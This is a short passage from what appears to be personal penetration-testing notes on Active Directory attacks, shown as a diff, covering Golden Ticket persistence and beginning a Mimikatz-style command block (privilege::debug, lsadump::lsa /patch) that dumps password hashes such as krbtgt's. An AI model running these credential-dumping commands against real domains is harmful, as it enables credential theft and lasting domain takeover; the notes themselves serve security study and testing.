KiritoLoveAsuna/Penetration-Testing/Active Directory Attacks.md

 ### Persistence
 #### Golden Tickets(only if we can get password hash of a domain user account called krbtgt)
+>The golden ticket will require us to have access to a Domain Admin's group account or to have compromised the domain controller itself to work as a persistence method
 ```
 privilege::debug
 lsadump::lsa /patch(get password hash)